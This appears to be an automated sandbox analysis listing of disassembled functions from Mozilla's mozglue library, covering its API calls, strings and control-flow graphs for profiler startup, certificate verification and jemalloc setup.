                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C9C54F9
                                                                  • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_HELP), ref: 6C9C5516
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C9C556A
                                                                  • AcquireSRWLockExclusive.KERNEL32(6CA3F4B8), ref: 6C9C5577
                                                                  • moz_xmalloc.MOZGLUE(00000070), ref: 6C9C5585
                                                                  • ?ProcessCreation@TimeStamp@mozilla@@SA?AV12@XZ.MOZGLUE(00000000,00000001), ref: 6C9C5590
                                                                  • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP,?,00000001), ref: 6C9C55E6
                                                                  • ReleaseSRWLockExclusive.KERNEL32(6CA3F4B8), ref: 6C9C5606
                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C9C5616
                                                                    • Part of subcall function 6C9EAB89: EnterCriticalSection.KERNEL32(6CA3E370,?,?,?,6C9B34DE,6CA3F6CC,?,?,?,?,?,?,?,6C9B3284), ref: 6C9EAB94
                                                                    • Part of subcall function 6C9EAB89: LeaveCriticalSection.KERNEL32(6CA3E370,?,6C9B34DE,6CA3F6CC,?,?,?,?,?,?,?,6C9B3284,?,?,6C9D56F6), ref: 6C9EABD1
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C9C563E
                                                                  • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C9C5646
                                                                  • exit.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000), ref: 6C9C567C
                                                                  • free.MOZGLUE(?), ref: 6C9C56AE
                                                                    • Part of subcall function 6C9D5E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C9D5EDB
                                                                    • Part of subcall function 6C9D5E90: memset.VCRUNTIME140(6CA17765,000000E5,55CCCCCC), ref: 6C9D5F27
                                                                    • Part of subcall function 6C9D5E90: LeaveCriticalSection.KERNEL32(?), ref: 6C9D5FB2
                                                                  • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_NO_BASE), ref: 6C9C56E8
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C9C5707
                                                                  • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00000001), ref: 6C9C570F
                                                                  • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_ENTRIES), ref: 6C9C5729
                                                                  • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_DURATION), ref: 6C9C574E
                                                                  • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_INTERVAL), ref: 6C9C576B
                                                                  • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_FEATURES_BITFIELD), ref: 6C9C5796
                                                                  • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_FEATURES), ref: 6C9C57B3
                                                                  • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_FILTERS), ref: 6C9C57CA
                                                                  Strings
                                                                  • [I %d/%d] - MOZ_PROFILER_STARTUP_FEATURES = %d, xrefs: 6C9C584E
                                                                  • MOZ_PROFILER_STARTUP_INTERVAL, xrefs: 6C9C5766
                                                                  • [I %d/%d] - MOZ_PROFILER_STARTUP_ENTRIES = %u, xrefs: 6C9C5C56
                                                                  • MOZ_PROFILER_STARTUP_DURATION, xrefs: 6C9C5749
                                                                  • [I %d/%d] -> This process is excluded and won't be profiled, xrefs: 6C9C5BBE
                                                                  • MOZ_PROFILER_STARTUP, xrefs: 6C9C55E1
                                                                  • [I %d/%d] - MOZ_PROFILER_STARTUP_FILTERS = %s, xrefs: 6C9C5B38
                                                                  • GeckoMain, xrefs: 6C9C5554, 6C9C55D5
                                                                  • MOZ_BASE_PROFILER_DEBUG_LOGGING, xrefs: 6C9C54A3
                                                                  • - MOZ_PROFILER_STARTUP_ENTRIES not a valid integer: %s, xrefs: 6C9C5D24
                                                                  • [I %d/%d] profiler_init, xrefs: 6C9C564E
                                                                  • [I %d/%d] - MOZ_PROFILER_STARTUP is set, xrefs: 6C9C5717
                                                                  • - MOZ_PROFILER_STARTUP_ENTRIES unit must be one of the following: KB, KiB, MB, MiB, GB, GiB, xrefs: 6C9C5D2B
                                                                  • [I %d/%d] - MOZ_PROFILER_STARTUP_FEATURES_BITFIELD = %d, xrefs: 6C9C5AC9
                                                                  • MOZ_PROFILER_STARTUP_FEATURES_BITFIELD, xrefs: 6C9C5791
                                                                  • MOZ_PROFILER_STARTUP_FEATURES, xrefs: 6C9C57AE
                                                                  • - MOZ_PROFILER_STARTUP_FEATURES_BITFIELD not a valid integer: %s, xrefs: 6C9C5D1C
                                                                  • MOZ_BASE_PROFILER_VERBOSE_LOGGING, xrefs: 6C9C548D
                                                                  • MOZ_BASE_PROFILER_HELP, xrefs: 6C9C5511
                                                                  • MOZ_BASE_PROFILER_LOGGING, xrefs: 6C9C54B9
                                                                  • - MOZ_PROFILER_STARTUP_DURATION not a valid float: %s, xrefs: 6C9C5CF9
                                                                  • MOZ_PROFILER_STARTUP_NO_BASE, xrefs: 6C9C56E3
                                                                  • MOZ_PROFILER_STARTUP_ENTRIES, xrefs: 6C9C5724
                                                                  • - MOZ_PROFILER_STARTUP_INTERVAL not a valid float: %s, xrefs: 6C9C5D01
                                                                  • MOZ_PROFILER_STARTUP_FILTERS, xrefs: 6C9C57C5
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2310018099.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2309989797.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310269865.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310324339.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310708430.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: getenv$CriticalSection$Current$Thread$EnterLeaveProcess$ExclusiveLock_getpidfree$AcquireCreation@Init_thread_footerReleaseStamp@mozilla@@TerminateTimeV12@exitmemsetmoz_xmalloc
                                                                  • String ID: - MOZ_PROFILER_STARTUP_DURATION not a valid float: %s$- MOZ_PROFILER_STARTUP_ENTRIES not a valid integer: %s$- MOZ_PROFILER_STARTUP_ENTRIES unit must be one of the following: KB, KiB, MB, MiB, GB, GiB$- MOZ_PROFILER_STARTUP_FEATURES_BITFIELD not a valid integer: %s$- MOZ_PROFILER_STARTUP_INTERVAL not a valid float: %s$GeckoMain$MOZ_BASE_PROFILER_DEBUG_LOGGING$MOZ_BASE_PROFILER_HELP$MOZ_BASE_PROFILER_LOGGING$MOZ_BASE_PROFILER_VERBOSE_LOGGING$MOZ_PROFILER_STARTUP$MOZ_PROFILER_STARTUP_DURATION$MOZ_PROFILER_STARTUP_ENTRIES$MOZ_PROFILER_STARTUP_FEATURES$MOZ_PROFILER_STARTUP_FEATURES_BITFIELD$MOZ_PROFILER_STARTUP_FILTERS$MOZ_PROFILER_STARTUP_INTERVAL$MOZ_PROFILER_STARTUP_NO_BASE$[I %d/%d] -> This process is excluded and won't be profiled$[I %d/%d] - MOZ_PROFILER_STARTUP is set$[I %d/%d] - MOZ_PROFILER_STARTUP_ENTRIES = %u$[I %d/%d] - MOZ_PROFILER_STARTUP_FEATURES = %d$[I %d/%d] - MOZ_PROFILER_STARTUP_FEATURES_BITFIELD = %d$[I %d/%d] - MOZ_PROFILER_STARTUP_FILTERS = %s$[I %d/%d] profiler_init
                                                                  • API String ID: 3686969729-1266492768
                                                                  • Opcode ID: f646fa98236b10308e33533eae65a6206acaa42f1e49382b41ba35b002985fd8
                                                                  • Instruction ID: 983ec2d7c63f9ade50ab9e9c1e116d828fb30292602eb2960ad45d0fea281951
                                                                  • Opcode Fuzzy Hash: f646fa98236b10308e33533eae65a6206acaa42f1e49382b41ba35b002985fd8
                                                                  • Instruction Fuzzy Hash: A8223671A047519FD7109F748C6426A7BB9BF5634CF14862AE84AC7B41EB34C886CB63

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 1602 6c9c6c80-6c9c6cd4 CryptQueryObject 1603 6c9c6cda-6c9c6cf7 1602->1603 1604 6c9c6e53-6c9c6e5d 1602->1604 1605 6c9c6cfd-6c9c6d19 CryptMsgGetParam 1603->1605 1606 6c9c733e-6c9c7384 call 6ca1c110 1603->1606 1607 6c9c73a2-6c9c73ae 1604->1607 1608 6c9c6e63-6c9c6e7e 1604->1608 1610 6c9c6d1f-6c9c6d61 moz_xmalloc memset CryptMsgGetParam 1605->1610 1611 6c9c71c4-6c9c71cd 1605->1611 1606->1605 1627 6c9c738a 1606->1627 1612 6c9c760f-6c9c762a 1607->1612 1613 6c9c73b4-6c9c7422 memset VerSetConditionMask * 4 VerifyVersionInfoW 1607->1613 1614 6c9c6e84-6c9c6e8c 1608->1614 1615 6c9c71e5-6c9c71f9 call 6c9eab89 1608->1615 1617 6c9c6d7f-6c9c6d90 free 1610->1617 1618 6c9c6d63-6c9c6d79 CertFindCertificateInStore 1610->1618 1623 6c9c77d7-6c9c77eb call 6c9eab89 1612->1623 1624 6c9c7630-6c9c763e 1612->1624 1619 6c9c7428-6c9c7439 1613->1619 1620 6c9c7604-6c9c7609 1613->1620 1621 6c9c7656-6c9c7660 1614->1621 1622 6c9c6e92-6c9c6ecb 1614->1622 1615->1614 1639 6c9c71ff-6c9c7211 call 6c9f0080 call 6c9eab3f 1615->1639 1628 6c9c731a-6c9c7325 1617->1628 1629 6c9c6d96-6c9c6d98 1617->1629 1618->1617 1633 6c9c7440-6c9c7454 1619->1633 1620->1612 1638 6c9c766f-6c9c76c5 1621->1638 1622->1621 1666 6c9c6ed1-6c9c6f0e CreateFileW 1622->1666 1623->1624 1643 6c9c77f1-6c9c7803 call 6ca1c240 call 6c9eab3f 1623->1643 1624->1621 1630 6c9c7640-6c9c7650 1624->1630 1627->1611 1636 6c9c6e0a-6c9c6e10 CertFreeCertificateContext 1628->1636 1637 6c9c732b 1628->1637 1629->1628 1634 6c9c6d9e-6c9c6da0 1629->1634 1630->1621 1651 6c9c745b-6c9c7476 1633->1651 1634->1628 1644 6c9c6da6-6c9c6dc9 CertGetNameStringW 1634->1644 1646 6c9c6e16-6c9c6e24 1636->1646 1637->1646 1640 6c9c76cb-6c9c76d5 1638->1640 1641 6c9c7763-6c9c7769 1638->1641 1639->1614 1647 6c9c776f-6c9c77a1 call 6ca1c110 1640->1647 1648 6c9c76db-6c9c7749 memset VerSetConditionMask * 4 VerifyVersionInfoW 1640->1648 1641->1647 1643->1624 1652 6c9c6dcf-6c9c6e08 moz_xmalloc memset CertGetNameStringW 1644->1652 1653 6c9c7330-6c9c7339 1644->1653 1655 6c9c6e2d-6c9c6e2f 1646->1655 1656 6c9c6e26-6c9c6e27 CryptMsgClose 1646->1656 1677 6c9c75ab-6c9c75b4 free 1647->1677 1659 6c9c7758-6c9c775d 1648->1659 1660 6c9c774b-6c9c7756 1648->1660 1664 6c9c747c-6c9c7484 1651->1664 1665 6c9c77a6-6c9c77ba call 6c9eab89 1651->1665 1652->1636 1653->1636 1657 6c9c6e3a-6c9c6e50 call 6c9eb320 1655->1657 1658 6c9c6e31-6c9c6e34 CertCloseStore 1655->1658 1656->1655 1658->1657 1659->1641 1660->1647 1672 6c9c75bf-6c9c75cb 1664->1672 1673 6c9c748a-6c9c74a6 1664->1673 1665->1664 1683 6c9c77c0-6c9c77d2 call 6ca1c290 call 6c9eab3f 1665->1683 1666->1633 1674 6c9c6f14-6c9c6f39 1666->1674 1681 6c9c75da-6c9c75f9 GetLastError 1672->1681 1673->1681 1696 6c9c74ac-6c9c74e5 moz_xmalloc memset 1673->1696 1679 6c9c6f3f-6c9c6f47 1674->1679 1680 6c9c7216-6c9c722a call 6c9eab89 1674->1680 1677->1672 1679->1651 1685 6c9c6f4d-6c9c6f70 1679->1685 1680->1679 1694 6c9c7230-6c9c7242 call 6c9f00d0 call 6c9eab3f 1680->1694 1686 6c9c75ff 1681->1686 1687 6c9c7167-6c9c7173 1681->1687 1683->1664 1707 6c9c74eb-6c9c750a GetLastError 1685->1707 1708 6c9c6f76-6c9c6fbd moz_xmalloc memset 1685->1708 1686->1620 1692 6c9c717c-6c9c7184 1687->1692 1693 6c9c7175-6c9c7176 CloseHandle 1687->1693 1697 6c9c71bc-6c9c71be 1692->1697 1698 6c9c7186-6c9c71a1 1692->1698 1693->1692 1694->1679 1696->1707 1697->1605 1697->1611 1702 6c9c7247-6c9c725b call 6c9eab89 1698->1702 1703 6c9c71a7-6c9c71af 1698->1703 1702->1703 1717 6c9c7261-6c9c7273 call 6c9f01c0 call 6c9eab3f 1702->1717 1703->1697 1709 6c9c71b1-6c9c71b9 1703->1709 1707->1708 1712 6c9c7510 1707->1712 1722 6c9c71d2-6c9c71e0 1708->1722 1723 6c9c6fc3-6c9c6fde 1708->1723 1709->1697 1712->1687 1717->1703 1727 6c9c714d-6c9c7161 free 1722->1727 1725 6c9c7278-6c9c728c call 6c9eab89 1723->1725 1726 6c9c6fe4-6c9c6feb 1723->1726 1725->1726 1734 6c9c7292-6c9c72a4 call 6c9f0120 call 6c9eab3f 1725->1734 1729 6c9c738f-6c9c739d 1726->1729 1730 6c9c6ff1-6c9c700c 1726->1730 1727->1687 1729->1727 1732 6c9c72a9-6c9c72bd call 6c9eab89 1730->1732 1733 6c9c7012-6c9c7019 1730->1733 1732->1733 1740 6c9c72c3-6c9c72e4 call 6c9f0030 call 6c9eab3f 1732->1740 1733->1729 1736 6c9c701f-6c9c704d 1733->1736 1734->1726 1736->1722 1748 6c9c7053-6c9c707a 1736->1748 1740->1733 1750 6c9c72e9-6c9c72fd call 6c9eab89 1748->1750 1751 6c9c7080-6c9c7088 1748->1751 1750->1751 1758 6c9c7303-6c9c7315 call 6c9f0170 call 6c9eab3f 1750->1758 1752 6c9c708e-6c9c70c6 memset 1751->1752 1753 6c9c7515 1751->1753 1760 6c9c7528-6c9c7534 1752->1760 1763 6c9c70cc-6c9c710b CryptQueryObject 1752->1763 1756 6c9c7517-6c9c7521 1753->1756 1756->1760 1758->1751 1765 6c9c753b-6c9c758d moz_xmalloc memset CryptBinaryToStringW 1760->1765 1763->1756 1766 6c9c7111-6c9c712a 1763->1766 1768 6c9c758f-6c9c75a3 _wcsupr_s 1765->1768 1769 6c9c75a9 1765->1769 1766->1765 1770 6c9c7130-6c9c714a 1766->1770 1768->1638 1768->1769 1769->1677 1770->1727
                                                                  APIs
                                                                  • CryptQueryObject.CRYPT32(00000001,?,00000400,00000002,00000000,?,?,?,?,?,00000000), ref: 6C9C6CCC
                                                                  • CryptMsgGetParam.CRYPT32(00000000,00000007,00000000,00000000,0000000C), ref: 6C9C6D11
                                                                  • moz_xmalloc.MOZGLUE(0000000C), ref: 6C9C6D26
                                                                    • Part of subcall function 6C9CCA10: malloc.MOZGLUE(?), ref: 6C9CCA26
                                                                  • memset.VCRUNTIME140(00000000,00000000,0000000C), ref: 6C9C6D35
                                                                  • CryptMsgGetParam.CRYPT32(00000000,00000007,00000000,00000000,0000000C), ref: 6C9C6D53
                                                                  • CertFindCertificateInStore.CRYPT32(00000000,00010001,00000000,000B0000,00000000,00000000), ref: 6C9C6D73
                                                                  • free.MOZGLUE(00000000), ref: 6C9C6D80
                                                                  • CertGetNameStringW.CRYPT32 ref: 6C9C6DC0
                                                                  • moz_xmalloc.MOZGLUE(00000000), ref: 6C9C6DDC
                                                                  • memset.VCRUNTIME140(00000000,00000000,00000000), ref: 6C9C6DEB
                                                                  • CertGetNameStringW.CRYPT32(00000000,00000004,00000000,00000000,00000000,00000000), ref: 6C9C6DFF
                                                                  • CertFreeCertificateContext.CRYPT32(00000000), ref: 6C9C6E10
                                                                  • CryptMsgClose.CRYPT32(00000000), ref: 6C9C6E27
                                                                  • CertCloseStore.CRYPT32(00000000,00000000), ref: 6C9C6E34
                                                                  • CreateFileW.KERNEL32 ref: 6C9C6EF9
                                                                  • moz_xmalloc.MOZGLUE(00000000), ref: 6C9C6F7D
                                                                  • memset.VCRUNTIME140(00000000,00000000,00000000), ref: 6C9C6F8C
                                                                  • memset.VCRUNTIME140(00000002,00000000,00000208), ref: 6C9C709D
                                                                  • CryptQueryObject.CRYPT32(00000001,00000002,00000400,00000002,00000000,?,?,?,?,?,00000000), ref: 6C9C7103
                                                                  • free.MOZGLUE(00000000), ref: 6C9C7153
                                                                  • CloseHandle.KERNEL32(?), ref: 6C9C7176
                                                                  • __Init_thread_footer.LIBCMT ref: 6C9C7209
                                                                  • __Init_thread_footer.LIBCMT ref: 6C9C723A
                                                                  • __Init_thread_footer.LIBCMT ref: 6C9C726B
                                                                  • __Init_thread_footer.LIBCMT ref: 6C9C729C
                                                                  • __Init_thread_footer.LIBCMT ref: 6C9C72DC
                                                                  • __Init_thread_footer.LIBCMT ref: 6C9C730D
                                                                  • memset.VCRUNTIME140(?,00000000,00000110), ref: 6C9C73C2
                                                                  • VerSetConditionMask.NTDLL ref: 6C9C73F3
                                                                  • VerSetConditionMask.NTDLL ref: 6C9C73FF
                                                                  • VerSetConditionMask.NTDLL ref: 6C9C7406
                                                                  • VerSetConditionMask.NTDLL ref: 6C9C740D
                                                                  • VerifyVersionInfoW.KERNEL32(?,00000033,00000000), ref: 6C9C741A
                                                                  • moz_xmalloc.MOZGLUE(?), ref: 6C9C755A
                                                                  • memset.VCRUNTIME140(00000000,00000000,?), ref: 6C9C7568
                                                                  • CryptBinaryToStringW.CRYPT32(00000000,00000000,4000000C,00000000,?), ref: 6C9C7585
                                                                  • _wcsupr_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6C9C7598
                                                                  • free.MOZGLUE(00000000), ref: 6C9C75AC
                                                                    • Part of subcall function 6C9EAB89: EnterCriticalSection.KERNEL32(6CA3E370,?,?,?,6C9B34DE,6CA3F6CC,?,?,?,?,?,?,?,6C9B3284), ref: 6C9EAB94
                                                                    • Part of subcall function 6C9EAB89: LeaveCriticalSection.KERNEL32(6CA3E370,?,6C9B34DE,6CA3F6CC,?,?,?,?,?,?,?,6C9B3284,?,?,6C9D56F6), ref: 6C9EABD1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2310018099.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2309989797.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310269865.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310324339.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310708430.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: CryptInit_thread_footermemset$Cert$ConditionMaskmoz_xmalloc$CloseStringfree$CertificateCriticalNameObjectParamQuerySectionStore$BinaryContextCreateEnterFileFindFreeHandleInfoLeaveVerifyVersion_wcsupr_smalloc
                                                                  • String ID: ($CryptCATAdminReleaseCatalogContext$SHA256$wintrust.dll
                                                                  • API String ID: 3256780453-3980470659
                                                                  • Opcode ID: 8ee5ff3b6d823f54a4aa98d8f1f6102d89f231a5b5793de92eb28d19f50ce141
                                                                  • Instruction ID: 8ceb47175be2def7fd1ea3aa263f91f7fa1680ca93e9cb58b9897203b637f6f2
                                                                  • Opcode Fuzzy Hash: 8ee5ff3b6d823f54a4aa98d8f1f6102d89f231a5b5793de92eb28d19f50ce141
                                                                  • Instruction Fuzzy Hash: 9052C1B1A003159BEB259F24CC98BAA77BDEF59708F108199E809D7640DB70EF85CF52
                                                                  APIs
                                                                  • EnterCriticalSection.KERNEL32(6CA3E7DC), ref: 6C9E7019
                                                                  • LeaveCriticalSection.KERNEL32(6CA3E7DC), ref: 6C9E7061
                                                                  • EnterCriticalSection.KERNEL32(?), ref: 6C9E71A4
                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 6C9E721D
                                                                  • memcpy.VCRUNTIME140(?,?,?), ref: 6C9E723E
                                                                  • EnterCriticalSection.KERNEL32(?), ref: 6C9E726C
                                                                  • memset.VCRUNTIME140(?,000000E5,000000FF), ref: 6C9E72B2
                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 6C9E733F
                                                                  • EnterCriticalSection.KERNEL32(0000000C), ref: 6C9E73E8
                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 6C9E961C
                                                                  • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C9E9622
                                                                  • ?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6C9E9642
                                                                  • ?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6C9E964F
                                                                  • ?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6C9E96CE
                                                                  • ?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6C9E96DB
                                                                  • AcquireSRWLockExclusive.KERNEL32(6CA3E804), ref: 6C9E9747
                                                                  • GetSystemInfo.KERNEL32(?), ref: 6C9E9792
                                                                  • __Init_thread_footer.LIBCMT ref: 6C9E97A5
                                                                  • GetEnvironmentVariableA.KERNEL32(MALLOC_OPTIONS,6CA3E810,00000040), ref: 6C9E97CF
                                                                  • InitializeCriticalSectionAndSpinCount.KERNEL32(6CA3E7B8,00001388), ref: 6C9E9838
                                                                  • InitializeCriticalSectionAndSpinCount.KERNEL32(6CA3E744,00001388), ref: 6C9E984E
                                                                  • InitializeCriticalSectionAndSpinCount.KERNEL32(6CA3E784,00001388), ref: 6C9E9874
                                                                  • InitializeCriticalSectionAndSpinCount.KERNEL32(6CA3E7DC,00001388), ref: 6C9E9895
                                                                  Strings
                                                                  • Compile-time page size does not divide the runtime one., xrefs: 6C9E9B38
                                                                  • MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x01U)) != 0) (Double-free?), xrefs: 6C9E99BD
                                                                  • : (malloc) Unsupported character in malloc options: ', xrefs: 6C9E9BF4
                                                                  • MOZ_RELEASE_ASSERT((run->mRegionsMask[elm] & (1U << bit)) == 0) (Double-free?), xrefs: 6C9E99D2
                                                                  • MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x20U)) == 0) (Freeing in decommitted page.), xrefs: 6C9E99A8
                                                                  • MOZ_CRASH(), xrefs: 6C9E9B42
                                                                  • <jemalloc>, xrefs: 6C9E9B33, 6C9E9BE3
                                                                  • MALLOC_OPTIONS, xrefs: 6C9E97CA
                                                                  • MOZ_RELEASE_ASSERT(!aArena || arena == aArena), xrefs: 6C9E9993
                                                                  • MOZ_RELEASE_ASSERT(mNode), xrefs: 6C9E9933, 6C9E9A33, 6C9E9A4E
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2310018099.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2309989797.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310269865.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310324339.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310708430.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSection$CountEnterInitializeK@1@LeaveMaybe@_RandomSpinUint64@mozilla@@$AcquireEnvironmentExclusiveInfoInit_thread_footerLockSystemVariable_errnomemcpymemset
                                                                  • String ID: : (malloc) Unsupported character in malloc options: '$<jemalloc>$Compile-time page size does not divide the runtime one.$MALLOC_OPTIONS$MOZ_CRASH()$MOZ_RELEASE_ASSERT(!aArena || arena == aArena)$MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x01U)) != 0) (Double-free?)$MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x20U)) == 0) (Freeing in decommitted page.)$MOZ_RELEASE_ASSERT((run->mRegionsMask[elm] & (1U << bit)) == 0) (Double-free?)$MOZ_RELEASE_ASSERT(mNode)
                                                                  • API String ID: 4047164644-4173974723
                                                                  • Opcode ID: cf91a649dc5a9a5301ab2fc6a71565dc76855ddafa2acf44b02ec3a8f184060e
                                                                  • Instruction ID: c8e137502fd52a88e9a349c2a136c3231d30f814641cfd06eb73faf5dcd8c108
                                                                  • Opcode Fuzzy Hash: cf91a649dc5a9a5301ab2fc6a71565dc76855ddafa2acf44b02ec3a8f184060e
                                                                  • Instruction Fuzzy Hash: 6C53AE71A057028FD709CF2CC580755BBE5BF99328F29C6ADE8698B792D731E841CB81
                                                                  APIs
                                                                  • EnterCriticalSection.KERNEL32(?), ref: 6C9F0F1F
                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 6C9F0F99
                                                                  • memcpy.VCRUNTIME140(?,?,?), ref: 6C9F0FB7
                                                                  • EnterCriticalSection.KERNEL32(?), ref: 6C9F0FE9
                                                                  • memset.VCRUNTIME140(?,000000E5,00000000), ref: 6C9F1031
                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 6C9F10D0
                                                                  • EnterCriticalSection.KERNEL32(?), ref: 6C9F117D
                                                                  • memset.VCRUNTIME140(?,000000E5,?), ref: 6C9F1C39
                                                                  • EnterCriticalSection.KERNEL32(6CA3E744), ref: 6C9F3391
                                                                  • LeaveCriticalSection.KERNEL32(6CA3E744), ref: 6C9F33CD
                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 6C9F3431
                                                                  • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C9F3437
                                                                  Strings
                                                                  • Compile-time page size does not divide the runtime one., xrefs: 6C9F3946
                                                                  • MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x01U)) != 0) (Double-free?), xrefs: 6C9F37BD
                                                                  • : (malloc) Unsupported character in malloc options: ', xrefs: 6C9F3A02
                                                                  • MOZ_RELEASE_ASSERT((run->mRegionsMask[elm] & (1U << bit)) == 0) (Double-free?), xrefs: 6C9F37D2
                                                                  • MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x20U)) == 0) (Freeing in decommitted page.), xrefs: 6C9F37A8
                                                                  • MOZ_CRASH(), xrefs: 6C9F3950
                                                                  • <jemalloc>, xrefs: 6C9F3941, 6C9F39F1
                                                                  • MALLOC_OPTIONS, xrefs: 6C9F35FE
                                                                  • MOZ_RELEASE_ASSERT(!aArena || arena == aArena), xrefs: 6C9F3793
                                                                  • MOZ_RELEASE_ASSERT(mNode), xrefs: 6C9F3559, 6C9F382D, 6C9F3848
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2310018099.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2309989797.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310269865.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310324339.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310708430.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSection$EnterLeave$memset$_errnomemcpy
                                                                  • String ID: : (malloc) Unsupported character in malloc options: '$<jemalloc>$Compile-time page size does not divide the runtime one.$MALLOC_OPTIONS$MOZ_CRASH()$MOZ_RELEASE_ASSERT(!aArena || arena == aArena)$MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x01U)) != 0) (Double-free?)$MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x20U)) == 0) (Freeing in decommitted page.)$MOZ_RELEASE_ASSERT((run->mRegionsMask[elm] & (1U << bit)) == 0) (Double-free?)$MOZ_RELEASE_ASSERT(mNode)
                                                                  • API String ID: 3040639385-4173974723
                                                                  • Opcode ID: b068fd7687e3e0e02c663749f96a902d59643423694caff780cbe886a2718a0e
                                                                  • Instruction ID: 8fdc686e7a7a9cc0ddb11595fd549d5021dc85437ae38d93c76e09ff7e8542b0
                                                                  • Opcode Fuzzy Hash: b068fd7687e3e0e02c663749f96a902d59643423694caff780cbe886a2718a0e
                                                                  • Instruction Fuzzy Hash: 6C538BB1A057428FD304CF28C550715BBE5BF8A328F29C6ADE8799B791D375E842CB81
                                                                  APIs
                                                                  • LoadLibraryW.KERNEL32(user32,?,6C9EE1A5), ref: 6CA15606
                                                                  • LoadLibraryW.KERNEL32(gdi32,?,6C9EE1A5), ref: 6CA1560F
